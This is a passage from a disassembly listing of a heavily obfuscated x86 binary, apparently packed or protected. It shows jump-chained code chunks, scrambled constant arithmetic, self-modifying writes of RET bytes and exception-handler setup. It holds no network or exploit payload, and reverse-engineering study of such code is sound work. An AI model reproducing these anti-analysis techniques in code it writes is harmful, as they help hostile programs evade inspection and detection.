		jmp	loc_45A005
sub_45A40E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_44C50F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4534CC

loc_45A424:				; CODE XREF: sub_4534CC-17A37j
		jmp	nullsub_455
; END OF FUNCTION CHUNK	FOR sub_4534CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448658

loc_45A429:				; CODE XREF: sub_448658:loc_43C69Ej
		cmp	eax, 270C8250h
		jmp	loc_442E73
; END OF FUNCTION CHUNK	FOR sub_448658
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_45A434:				; CODE XREF: sub_44DED9+43DAj
		pushf

loc_45A435:				; CODE XREF: y2kk37jd:0044EFADj
		add	esi, edx
		jmp	loc_45797B
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_45A43C:				; CODE XREF: sub_43BF5F:loc_442C82j
					; sub_43BF5F+15882j
		push	563BA19Ah
		pop	eax
		sub	eax, 7DE290B5h
		rol	eax, 13h
		sub	eax, 94F446CDh
		add	eax, 0BABCF06Bh
		add	eax, ebp
		jmp	loc_45BA2B
; END OF FUNCTION CHUNK	FOR sub_43BF5F

; =============== S U B	R O U T	I N E =======================================



sub_45A45E	proc near		; CODE XREF: sub_445226:loc_43E915p
					; sub_449C4F:loc_453E32j

; FUNCTION CHUNK AT 00442813 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A036 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F295 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00452928 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004533F1 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		cmp	dword ptr [ebp-4], 0
		jz	loc_448B33
		jmp	loc_4533F1
sub_45A45E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A471:				; CODE XREF: y2kk37jd:00456DA6j
		jz	loc_4513C9
		jmp	loc_4522DB

; =============== S U B	R O U T	I N E =======================================



sub_45A47C	proc near		; CODE XREF: sub_4530D8+78DAp
					; y2kk37jd:0045B935j

; FUNCTION CHUNK AT 00448847 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		lea	eax, loc_445512
		mov	byte ptr [eax],	0C3h
		jmp	loc_448847
sub_45A47C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45A48E	proc near		; CODE XREF: .text:0040D0C8p
					; sub_45979A+9j
					; DATA XREF: ...
		call	sub_45979A

loc_45A493:				; CODE XREF: sub_452545+9j
		jmp	nullsub_321
sub_45A48E	endp

; ---------------------------------------------------------------------------

loc_45A498:				; DATA XREF: sub_43BC82+1o
		push	0C4508BF1h
		xchg	esi, [esp]
		mov	ebx, esi
		pop	esi
		and	ebx, 0E7541DDBh
		xor	ebx, 0F3DBADEFh
		cmp	ebx, 0FD4521A4h
		jmp	loc_45273C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45A4BA:				; CODE XREF: sub_453867:loc_451CE3j
		xor	eax, ecx
		jnb	loc_45058F
		add	eax, ebp
		add	eax, ecx
; END OF FUNCTION CHUNK	FOR sub_453867
; START	OF FUNCTION CHUNK FOR sub_440337

loc_45A4C6:				; CODE XREF: sub_440337:loc_4555CEj
		jmp	loc_43FB33
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45A4CB:				; CODE XREF: sub_445226+E69Aj
		jl	loc_448E9C
		xchg	ebx, [edi]

loc_45A4D3:				; CODE XREF: sub_445226-59D8j
		xor	eax, 0BFA2D994h
		add	eax, 0F75AA857h

loc_45A4DF:				; CODE XREF: y2kk37jd:loc_45C0A5j
		jmp	loc_453AD1
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_220. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45A4E5:				; CODE XREF: y2kk37jd:00451602j
		jmp	loc_447A75
; ---------------------------------------------------------------------------

loc_45A4EA:				; DATA XREF: sub_457F0C+7o
		mov	large fs:0, esp
		call	sub_45B4CB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_205. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_45A4F7:				; CODE XREF: sub_44BD20:loc_458F55j
		jnz	loc_44DDAE
; END OF FUNCTION CHUNK	FOR sub_44BD20
; START	OF FUNCTION CHUNK FOR sub_4477F9

loc_45A4FD:				; CODE XREF: sub_4477F9+9937j
		jmp	sub_459F8F
; END OF FUNCTION CHUNK	FOR sub_4477F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_45A502:				; CODE XREF: sub_446861+7BBBj
		jmp	loc_440EB4
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44461D

loc_45A507:				; CODE XREF: sub_44461D+3j
		jmp	loc_45B52B
; END OF FUNCTION CHUNK	FOR sub_44461D
; ---------------------------------------------------------------------------
		mov	edx, esi
		jmp	loc_44DDA7
; ---------------------------------------------------------------------------
		cmp	ebx, esi
		jmp	loc_43FCB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450B30

loc_45A51A:				; CODE XREF: sub_450B30:loc_4493A0j
		jnz	loc_45A881
		jmp	loc_443ED1
; END OF FUNCTION CHUNK	FOR sub_450B30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_45A525:				; CODE XREF: sub_44C304:loc_441B28j
		jnz	loc_446A2E
; END OF FUNCTION CHUNK	FOR sub_44C304
; START	OF FUNCTION CHUNK FOR sub_447F7C

loc_45A52B:				; CODE XREF: sub_447F7C+874Ej
		jmp	loc_4506D5
; END OF FUNCTION CHUNK	FOR sub_447F7C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444C79

loc_45A530:				; CODE XREF: sub_444C79+Dj
		jmp	sub_455BE9
; END OF FUNCTION CHUNK	FOR sub_444C79
; ---------------------------------------------------------------------------
		adc	ebp, esi
		mov	eax, 64AEA7EAh
		popf
		jmp	loc_446A2C
; ---------------------------------------------------------------------------

loc_45A542:				; DATA XREF: sub_45494E+Co
		add	edi, 4C787778h
		mov	edi, [edi]
		xchg	edi, [esp]
		push	eax
		mov	eax, edi
		jmp	loc_43B973
; ---------------------------------------------------------------------------

loc_45A555:				; CODE XREF: y2kk37jd:00457BE3j
		jnz	loc_444593
		jmp	loc_4549B9
; ---------------------------------------------------------------------------

locret_45A560:				; CODE XREF: y2kk37jd:004550F2j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_45A561:				; CODE XREF: sub_4468E0-8A4j
		jmp	loc_444C36
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B75

loc_45A566:				; CODE XREF: sub_452B75-C6Fj
		jnz	loc_45485A
		call	sub_454568
; END OF FUNCTION CHUNK	FOR sub_452B75
; START	OF FUNCTION CHUNK FOR sub_43B7F3

loc_45A571:				; CODE XREF: sub_43B7F3+18590j
		jmp	nullsub_322
; END OF FUNCTION CHUNK	FOR sub_43B7F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443831

loc_45A576:				; CODE XREF: sub_443831-63AAj
		jmp	loc_44A51F
; END OF FUNCTION CHUNK	FOR sub_443831
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE51

loc_45A57B:				; CODE XREF: sub_43FE51+Bj
		pop	eax
		and	eax, ds:4000EAh
		rol	eax, 0Dh
		add	eax, ds:4000ECh
		xor	eax, 92B7A0Fh
		add	eax, ebp
		jmp	loc_45486F
; END OF FUNCTION CHUNK	FOR sub_43FE51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_45A598:				; CODE XREF: sub_44B814:loc_456E83j
		cmp	esi, eax
		jmp	loc_43B2B5
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_45A59F:				; CODE XREF: sub_445787+1388Bj
		jg	loc_45B2D1

loc_45A5A5:				; CODE XREF: sub_445787+372Cj
		xor	eax, 1511E90Ah
		call	sub_44113A
		sub	eax, 1F6FAFE2h
		rol	eax, 7
		jmp	loc_44BC80
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------

loc_45A5BE:				; CODE XREF: y2kk37jd:004596B9j
		shl	edi, 14h
		mov	edi, [edx]
		xor	edi, esi
		jmp	loc_45AD24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_378. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B019

loc_45A5CB:				; CODE XREF: sub_45B019+6j
		jmp	loc_43D2C1
; END OF FUNCTION CHUNK	FOR sub_45B019
; ---------------------------------------------------------------------------

loc_45A5D0:				; CODE XREF: y2kk37jd:004560C9j
		jmp	loc_44F81A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45A5D5:				; CODE XREF: sub_453867-145B5j
		jmp	loc_44DAD2
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		or	ebx, 0BB002B8Ah
		jmp	sub_44D01D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_45A5E5:				; CODE XREF: y2kk37jd:00443A96j
					; sub_44AC89-44F7j
		jnz	loc_452637
		jmp	loc_4513E5
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45A5F0:				; CODE XREF: sub_43ED19:loc_44E76Dj
		pop	edx
		add	edx, 5CF10503h
		xor	edx, ds:4000ECh
		and	edx, 992039D8h
		rol	edx, 15h
		xor	edx, 5A3C1CFh
		push	edi
		jmp	loc_445B12
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_45A612:				; DATA XREF: sub_4445D2+1o
		js	loc_45B5B9
		mov	eax, [esp]
		push	eax
		mov	eax, edx
		xchg	eax, [esp]
		push	ebx
		push	9EC29B31h
		jmp	loc_447D38
; ---------------------------------------------------------------------------

loc_45A62C:				; CODE XREF: y2kk37jd:004488DAj
		js	loc_43D21F

; =============== S U B	R O U T	I N E =======================================



sub_45A632	proc near		; CODE XREF: sub_44610D+CB71p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440AD9 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	eax, [esp-4+arg_0]
		jmp	loc_440AD9
sub_45A632	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD49

loc_45A63E:				; CODE XREF: sub_43BD49:loc_44AF5Aj
		jnz	loc_446FCF
		jmp	loc_45A32F
; END OF FUNCTION CHUNK	FOR sub_43BD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B1FD

loc_45A649:				; CODE XREF: sub_43B1FD:loc_4402BCj
					; y2kk37jd:004402D4j
		add	ebx, 0F6F02829h
		xchg	ebx, [esp+4+var_4]
		jmp	sub_43BA66
; END OF FUNCTION CHUNK	FOR sub_43B1FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490CB

loc_45A657:				; CODE XREF: sub_4490CB+6j
		mov	ebp, esp
		push	eax

loc_45A65A:				; CODE XREF: sub_44289F:loc_44A212j
		mov	eax, edx
		xchg	eax, [esp+8+var_8]
		jmp	loc_456C01
; END OF FUNCTION CHUNK	FOR sub_4490CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45A664:				; CODE XREF: sub_453867-BC17j
		push	offset loc_43C302
		jmp	nullsub_327
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_45A66E:				; DATA XREF: sub_44B24F-E1FEo
		xchg	esi, [esp]
		jmp	sub_440CD1
; ---------------------------------------------------------------------------
		push	offset sub_44310A
		jmp	locret_43D93D
; ---------------------------------------------------------------------------

loc_45A680:				; CODE XREF: y2kk37jd:loc_445A65j
		jmp	ds:dword_41E0F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4464B3

loc_45A686:				; CODE XREF: sub_4464B3+8j
		jmp	nullsub_328
; END OF FUNCTION CHUNK	FOR sub_4464B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		js	loc_446F09
		mov	eax, [esp]
		jmp	loc_45BACF
; ---------------------------------------------------------------------------

loc_45A69A:				; DATA XREF: sub_445226+11Co
		test	eax, eax
		push	offset loc_455084
		jmp	loc_459AEB
; ---------------------------------------------------------------------------

loc_45A6A6:				; DATA XREF: sub_454539:loc_43DBEDo
		rol	eax, 1Ch
		push	ecx
		push	eax
		pop	ecx

loc_45A6AC:				; CODE XREF: y2kk37jd:loc_450A10j
		xchg	ecx, [esp]
		jmp	loc_4539E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_45A6B4:				; CODE XREF: sub_456809-17E94j
		jge	loc_448B2B
		jmp	loc_44B9E9
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F9C

loc_45A6BF:				; CODE XREF: sub_442F9C+3EBj
		jno	loc_43E24F

loc_45A6C5:				; CODE XREF: sub_442F9C+182EAj
		rol	ebx, 13h
		and	ebx, 81A8AAACh
		add	ebx, 7ED775F8h
		xchg	ebx, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_442F9C
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_45A6D7:				; CODE XREF: sub_4577FE-154EAj
		push	eax
		pushf
		jmp	loc_453B01
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45A6DE:				; CODE XREF: sub_4448E2-7CBAj
		jnz	loc_43FF8A
		jmp	loc_45B638
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AC5C

loc_45A6EA:				; CODE XREF: sub_45AC5C+9j
		jmp	loc_441AF3
; END OF FUNCTION CHUNK	FOR sub_45AC5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_45A6EF:				; CODE XREF: sub_442EB4+BBC9j
					; sub_4448E2:loc_456B8Dj
		jmp	loc_45A2E9
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_45A6F4:				; CODE XREF: sub_43F2F2+E044j
		jmp	nullsub_330
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_45A6F9:				; CODE XREF: sub_44A298:loc_44D0C6j
					; sub_43B2EB:loc_45B9ABj
		call	sub_459763
		jnb	loc_448693
		push	ecx
		jmp	loc_441AA6
; END OF FUNCTION CHUNK	FOR sub_44A298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C88

loc_45A70A:				; CODE XREF: sub_452C88-11178j
		jnz	loc_4572F6

loc_45A710:				; CODE XREF: y2kk37jd:004569E4j
		jmp	loc_44457F
; END OF FUNCTION CHUNK	FOR sub_452C88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_45A715:				; CODE XREF: sub_457A46-E9A2j
		jmp	loc_440773
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
		jo	loc_43D4D1
		mov	ebp, [edi]
		jmp	loc_4572F4
; ---------------------------------------------------------------------------

loc_45A727:				; CODE XREF: y2kk37jd:0044C4B7j
		and	edx, 5B401E14h
		xor	edx, 274F5E77h
		add	edx, ebp
		add	edx, 9BB0BD7Dh
		mov	edx, [edx]
		shr	edx, 3
		jmp	loc_45B403
; ---------------------------------------------------------------------------
		pop	edi
		jmp	sub_43E07B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_45A74B:				; CODE XREF: sub_43F8B8:loc_44664Aj
		push	22CAB3C0h
		pop	edi
		add	edi, 0A514FACh
		or	edi, 7B72C270h
		jmp	loc_43B2C2
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

locret_45A762:				; CODE XREF: y2kk37jd:loc_454C69j
		retn
; ---------------------------------------------------------------------------

loc_45A763:				; CODE XREF: y2kk37jd:00457773j
		jmp	sub_440CD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_45A768:				; CODE XREF: sub_43B0F5+18F64j
		jmp	loc_43B0FE
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_45A76D:				; CODE XREF: sub_43F8B8+108ACj
		jmp	loc_44D47D
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_45A772:				; CODE XREF: sub_44B814-1736j
		jmp	loc_454869
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------

loc_45A777:				; CODE XREF: y2kk37jd:00448329j
		push	eax
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		jmp	loc_45A9D9

; =============== S U B	R O U T	I N E =======================================



sub_45A783	proc near		; CODE XREF: y2kk37jd:0043FD17j
					; sub_459A7D:loc_458479p

; FUNCTION CHUNK AT 0043D9E1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443751 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0044495B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447062 SIZE 0000000C BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	al, [eax]
		jnz	loc_43D9E1
		sub	al, 99h
		jmp	loc_447062
sub_45A783	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_45A797:				; CODE XREF: sub_44001E-33DFj
		jmp	loc_445DB2
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
		xor	ecx, eax
		xchg	ebx, ecx

loc_45A7A0:				; CODE XREF: y2kk37jd:loc_44B5D3j
		jmp	sub_4567FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E25A

loc_45A7A5:				; CODE XREF: sub_43E25A+6j
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		jmp	loc_44AAF8
; END OF FUNCTION CHUNK	FOR sub_43E25A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C14C

loc_45A7B0:				; CODE XREF: sub_45C14C+Cj
		xor	esi, 425E0DDAh
		js	loc_447CE6
; END OF FUNCTION CHUNK	FOR sub_45C14C
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_45A7BC:				; CODE XREF: sub_44F641+94D1j
		jmp	loc_456A59
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_45A7C1:				; CODE XREF: sub_44B924-8915j
		jmp	loc_456E9C
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
		test	ebx, 179DE05Ch
		jmp	loc_453728
; ---------------------------------------------------------------------------

locret_45A7D1:				; CODE XREF: y2kk37jd:loc_43D94Dj
		retn
; ---------------------------------------------------------------------------

loc_45A7D2:				; CODE XREF: y2kk37jd:0045375Bj
		jmp	loc_45A121
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FA88

loc_45A7D7:				; CODE XREF: sub_44FA88+7j
		jmp	loc_44A1F6
; END OF FUNCTION CHUNK	FOR sub_44FA88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_45A7DC:				; CODE XREF: sub_451464-D911j
		jmp	nullsub_335
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------

loc_45A7E1:				; CODE XREF: y2kk37jd:0043F89Ej
		jmp	sub_4587AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447407

loc_45A7E6:				; CODE XREF: sub_447407+C193j
		xchg	eax, ebx
		jmp	loc_4579C5
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2FD

loc_45A7ED:				; CODE XREF: sub_43B2FD+1A218j
		push	offset sub_443D4D
		jmp	nullsub_336
; END OF FUNCTION CHUNK	FOR sub_43B2FD

; =============== S U B	R O U T	I N E =======================================



sub_45A7F7	proc near		; CODE XREF: sub_45136B:loc_455BC5j

; FUNCTION CHUNK AT 004592D5 SIZE 00000005 BYTES

		push	ebx
		push	offset loc_441C9B
		jmp	loc_4592D5
sub_45A7F7	endp

; ---------------------------------------------------------------------------

loc_45A802:				; CODE XREF: y2kk37jd:0044D930j
		mov	ebx, ecx
		jnb	loc_44B9C0

loc_45A80A:				; CODE XREF: y2kk37jd:loc_446BE0j
		call	sub_442A84
		lea	eax, sub_44F334
		push	ebx
		jmp	loc_44C989
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_274. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A3A8

loc_45A81C:				; CODE XREF: sub_45A3A8+8j
		jmp	loc_4535F0
; END OF FUNCTION CHUNK	FOR sub_45A3A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440DC1

loc_45A821:				; CODE XREF: sub_440DC1+Cj
		jmp	loc_4448BA
; END OF FUNCTION CHUNK	FOR sub_440DC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_45A826:				; CODE XREF: sub_443525-453Cj
		jmp	loc_43FC6F
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------

loc_45A82B:				; CODE XREF: y2kk37jd:0043B564j
		shl	ebx, 3
		add	ecx, edx
		pop	eax
		xchg	edi, [esp]
		jmp	loc_44732C
; ---------------------------------------------------------------------------
		xor	ebp, 57ADB01Fh
		jmp	loc_451415
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BB6F

loc_45A844:				; CODE XREF: sub_43BB6F+1Cj
		add	edi, 0CD38758h
		xchg	edi, [esp-4+arg_0]
		jmp	sub_43C326
; END OF FUNCTION CHUNK	FOR sub_43BB6F
; ---------------------------------------------------------------------------
		or	edi, 9B4FA565h
		xchg	edx, [eax]
		jmp	loc_445422
; ---------------------------------------------------------------------------

loc_45A85F:				; CODE XREF: y2kk37jd:00458E3Cj
		jp	loc_44D2EC

; =============== S U B	R O U T	I N E =======================================



sub_45A865	proc near		; CODE XREF: sub_455DDE+3B95p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043DE5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004413FC SIZE 00000004 BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		xchg	ebx, [esp+0]
		jmp	loc_43DE5B
sub_45A865	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_279. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BAF2

loc_45A872:				; CODE XREF: sub_43BAF2+15334j
		jmp	loc_448CE0
; END OF FUNCTION CHUNK	FOR sub_43BAF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_45A877:				; CODE XREF: sub_44B924+26C0j
		jmp	nullsub_338
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443ECB

loc_45A87C:				; CODE XREF: sub_443ECB+6ED6j
		mov	[ecx], ebp
		shr	esi, 0Fh

loc_45A881:				; CODE XREF: sub_450B30:loc_45A51Aj
		push	offset loc_4554B4
		jmp	loc_44CF2C
; END OF FUNCTION CHUNK	FOR sub_443ECB
; ---------------------------------------------------------------------------

loc_45A88B:				; CODE XREF: y2kk37jd:0045BE08j
		sub	edi, 0ADD4FE69h

; =============== S U B	R O U T	I N E =======================================



sub_45A891	proc near		; CODE XREF: sub_43F75D+B1B7p
		xchg	edx, [esp+0]
		pop	edx
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_18
sub_45A891	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45A89D	proc near		; CODE XREF: sub_40C517+2A6p
					; sub_40C517+318p ...
		call	sub_442F52
		jmp	ds:off_41E12C
sub_45A89D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_45A8A8:				; CODE XREF: sub_4553C1:loc_453D27j
		jmp	nullsub_339
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
		jmp	ds:off_41E150
; ---------------------------------------------------------------------------

loc_45A8B3:				; CODE XREF: y2kk37jd:00456E1Ej
		jmp	loc_44E55C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_45A8B8:				; CODE XREF: sub_4562E5-7A72j
		jmp	loc_442CF1
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_45A8BD:				; CODE XREF: sub_449DFE+4599j
		jmp	loc_447123
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB8B

loc_45A8C2:				; CODE XREF: sub_453867:loc_4459D3j
					; sub_44CB8B+14j ...
		jns	loc_45AF7D
		xchg	ebx, [esp+0]
		mov	edx, ebx
		jmp	loc_44F39E
; END OF FUNCTION CHUNK	FOR sub_44CB8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45A8D2:				; CODE XREF: sub_45689F-CAADj
		mov	[ecx], edi
		popf
		adc	ebx, 136A1804h

loc_45A8DB:				; CODE XREF: sub_45689F:loc_4429B7j
		inc	eax
		jmp	loc_443438
; END OF FUNCTION CHUNK	FOR sub_45689F

; =============== S U B	R O U T	I N E =======================================



sub_45A8E1	proc near		; DATA XREF: sub_44001E+12DA7o
		pushf
		push	4A70D73Fh
		pop	esi
		xor	esi, 6DA8E028h
		call	sub_452EA0
sub_45A8E1	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44FA95

loc_45A8F3:				; CODE XREF: sub_44FA95:loc_450508j
		pop	esi
		push	0EAF197C6h
		pop	eax
		and	eax, 98E70B0Ah
		jmp	loc_451E8B
; END OF FUNCTION CHUNK	FOR sub_44FA95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_45A905:				; CODE XREF: sub_442938:loc_445124j
		pop	esi
		sub	esi, 35F67DA5h
		or	esi, 0F8B99C5h
		and	esi, 0DDCF90A1h
		add	esi, 62B5F5DFh
		xchg	esi, [esp+8+var_8]
		jmp	loc_44C46E
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C3E

loc_45A926:				; CODE XREF: sub_442C3E+Dj
		pop	edx
		and	edx, 0A2C274A9h
		sub	edx, 2A47816h
		and	edx, 4B05F08Dh
		call	sub_44866D
; END OF FUNCTION CHUNK	FOR sub_442C3E
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_45A93E:				; CODE XREF: sub_43C054+6812j
		jmp	loc_4460BA
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_45A943:				; CODE XREF: sub_449DFE+1754j
		jnz	loc_445A04
		jmp	loc_44B211
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------
		add	ecx, 6EE1B726h
		jmp	loc_456FF6
; ---------------------------------------------------------------------------

loc_45A959:				; CODE XREF: y2kk37jd:loc_448424j
		mov	byte ptr [eax],	0C3h
		jmp	loc_4519E9

; =============== S U B	R O U T	I N E =======================================



sub_45A961	proc near		; CODE XREF: sub_414954+FCp
					; sub_417B4D+14p ...

; FUNCTION CHUNK AT 0043E8F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004443AB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044512E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004458FC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044640F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00447ED3 SIZE 0000000B BYTES
